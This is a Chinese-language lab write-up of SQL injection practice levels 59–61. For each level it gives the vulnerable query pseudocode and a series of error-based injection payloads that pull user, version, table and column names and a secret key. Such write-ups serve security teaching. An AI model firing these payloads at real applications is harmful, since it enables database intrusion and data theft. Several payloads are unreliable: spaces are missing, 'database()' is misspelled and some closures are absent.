WEB常见漏洞之SQL注入（靶场篇—4）3

Lesson-59

该题为数字型get型注入，利用方式包括报错注入、布尔盲注、时间盲注

id=1'

目标SQL语句如下：

if($_POST['reset']):

 setcookie('challenge',' ',time()-3600000);

else:

  if($_COOKIE['challenge']):

     $sessid=$_COOKIE['challenge'];

  else:

     $expire =time()+60*60*24*30;

$hash =data($table,$col);

setcookie("challenge", $hash, $expire);

if($_GET['id']):

  $id=$_GET['id'];

  next_tryy()>=($times+1)

  $sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

iftrue:

     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");

$pass = array_reverse($unames);

  输出查询信息;

else:

  print_r(mysql_error());

注意：该题与Lesson58的利用方式相同，只不过拼接方式由单引号转为了数字

使用报错注入判断注入点

id=1--+

查询基础信息

id=1and(selectcount(*)from information_schema.tablesgroupby concat((selectuser()),0x7e,floor(rand(0)*2)))--+

id=1and(selectcount(*)from information_schema.tablesgroupby concat((select version()),0x7e,floor(rand(0)*2)))--+

id=1and(selectcount(*)from information_schema.tablesgroupby concat((select databse()),0x7e,floor(rand(0)*2)))--+

查询表名

id=1and(selectcount(*)from information_schema.tablesgroupby concat((selecttable_namefrom information_schema.tableswhere table_schema=database()limit0,1),0x7e,floor(rand(0)*2)))--+

查询列名

id=1and(selectcount(*)from information_schema.tablesgroupby concat((select column_name from information_schema.columnswheretable_name='x1qk033kut'limit2,1),0x7e,floor(rand(0)*2)))--+

查询关键信息

id=1and(selectcount(*)from information_schema.tablesgroupby concat((select secret_9MWT from x1qk033kut limit0,1),0x7e,floor(rand(0)*2)))--+

成功拿到 key 值：LtSOIKqX4EC5zCPwOzc6NFS7

需要注意的是每次表名和列名都会不同，及时修改可以查询到具体信息

Lesson-60

该题为单括号双引号get型注入，利用方式包括报错注入、布尔盲注、时间盲注

id=1'

目标SQL语句如下：

if($_POST['reset']):

 setcookie('challenge',' ',time()-3600000);

else:

  if($_COOKIE['challenge']):

     $sessid=$_COOKIE['challenge'];

  else:

     $expire =time()+60*60*24*30;

$hash =data($table,$col);

setcookie("challenge", $hash, $expire);

if($_GET['id']):

  $id=$_GET['id'];

  $id ='("'.$id.'")';

  next_tryy()>=($times+1)

  $sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

iftrue:

     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");

$pass = array_reverse($unames);

  输出查询信息;

else:

  print_r(mysql_error());

注意：该题与Lesson58的利用方式相同，只不过拼接方式由单引号转为了单括号双引号

使用报错注入判断注入点

id=1")--+

查询基础信息

id=1") and (select count(*) from information_schema.tables group by concat((select user()),0x7e,floor(rand(0)*2)))--+

id=1 and (select count(*) from information_schema.tables group by concat((select version()),0x7e,floor(rand(0)*2)))--+

id=1 and (select count(*) from information_schema.tables group by concat((select databse()),0x7e,floor(rand(0)*2)))--+

查询表名

id=1") and (select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2)))--+

查询列名

id=1") and (select count(*) from information_schema.tables group by concat((select column_name from information_schema.columns where table_name='bc8q88rlor' limit 2,1),0x7e,floor(rand(0)*2)))--+

查询关键信息

id=1") and (select count(*) from information_schema.tables group by concat((select secret_DAAH from bc8q88rlor limit 0,1),0x7e,floor(rand(0)*2)))--+

成功拿到 key 值：O8c2mJWO68hDxl7cAPYNpElM

需要注意的是每次表名和列名都会不同，及时修改可以查询到具体信息

Lesson-61

该题为双括号单引号get型注入，利用方式包括报错注入、布尔盲注、时间盲注

id=1'

目标SQL语句如下：

if($_POST['reset']):

 setcookie('challenge',' ',time()-3600000);

else:

  if($_COOKIE['challenge']):

     $sessid=$_COOKIE['challenge'];

  else:

     $expire =time()+60*60*24*30;

$hash =data($table,$col);

setcookie("challenge", $hash, $expire);

if($_GET['id']):

  $id=$_GET['id'];

  next_tryy()>=($times+1)

  $sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";

iftrue:

     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");

$pass = array_reverse($unames);

  输出查询信息;

else:

  print_r(mysql_error());

注意：该题与Lesson58的利用方式相同，只不过拼接方式由单引号转为了双括号单引号

使用报错注入判断注入点

id=1'))--+

查询基础信息

id=1')) and (select count(*) from information_schema.tables group by concat((select user()),0x7e,floor(rand(0)*2)))--+

id=1'))and(selectcount(*)from information_schema.tablesgroupby concat((select version()),0x7e,floor(rand(0)*2)))--+

id=1')) and (select count(*) from information_schema.tables group by concat((select databse()),0x7e,floor(rand(0)*2)))--+

查询表名

id=1')) and (select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2)))--+

查询列名

id=1')) and (select count(*) from information_schema.tables group by concat((select column_name from information_schema.columns where table_name='upre7krqfg' limit 2,1),0x7e,floor(rand(0)*2)))--+

查询关键信息

id=1')) and (select count(*) from information_schema.tables group by concat((select secret_EX6I from upre7krqfg limit 0,1),0x7e,floor(rand(0)*2)))--+

成功拿到 key 值：6lB7uSQQDKE96ZNcXEDiREHG

需要注意的是每次表名和列名都会不同，及时修改可以查询到具体信息